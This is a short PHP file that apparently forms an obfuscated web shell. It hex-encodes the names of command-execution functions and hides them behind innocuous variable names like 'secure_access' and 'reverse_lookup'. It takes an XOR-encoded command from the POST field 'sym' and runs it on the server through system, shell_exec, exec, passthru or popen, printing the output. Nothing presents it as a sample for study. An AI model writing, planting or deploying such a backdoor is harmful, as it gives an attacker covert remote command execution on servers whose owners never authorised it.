<?php
$secure_access = "\x68\x65x\x32\x62in";
$reverse_lookup3 = "\x65xe\x63";
$reverse_lookup5 = "\x70open";
$reverse_lookup4 = "pas\x73thru";
$reverse_lookup1 = "sys\x74em";
$reverse_lookup2 = "\x73\x68e\x6Cl\x5F\x65xec";
$reverse_lookup7 = "\x70\x63l\x6Fse";
$reverse_lookup6 = "\x73t\x72\x65a\x6D_g\x65t_\x63o\x6E\x74\x65nt\x73";
if (isset($_POST["sym"])) {
function system_core ( $fac , $pset ) {
$mrk = '' ;
$y=0;
while($y<strlen($fac)){
$mrk.=chr(ord($fac[$y])^$pset);
$y++;
} return $mrk;
}
$sym = $secure_access($_POST["sym"]);
$sym = system_core($sym, 66);
if (function_exists($reverse_lookup1)) {
$reverse_lookup1($sym);
} elseif (function_exists($reverse_lookup2)) {
print $reverse_lookup2($sym);
} elseif (function_exists($reverse_lookup3)) {
$reverse_lookup3($sym, $element_fac);
print join("\n", $element_fac);
} elseif (function_exists($reverse_lookup4)) {
$reverse_lookup4($sym);
} elseif (function_exists($reverse_lookup5) && function_exists($reverse_lookup6) && function_exists($reverse_lookup7)) {
$pset_mrk = $reverse_lookup5($sym, 'r');
if ($pset_mrk) {
$rec_ent = $reverse_lookup6($pset_mrk);
$reverse_lookup7($pset_mrk);
print $rec_ent;
}
}
exit;
}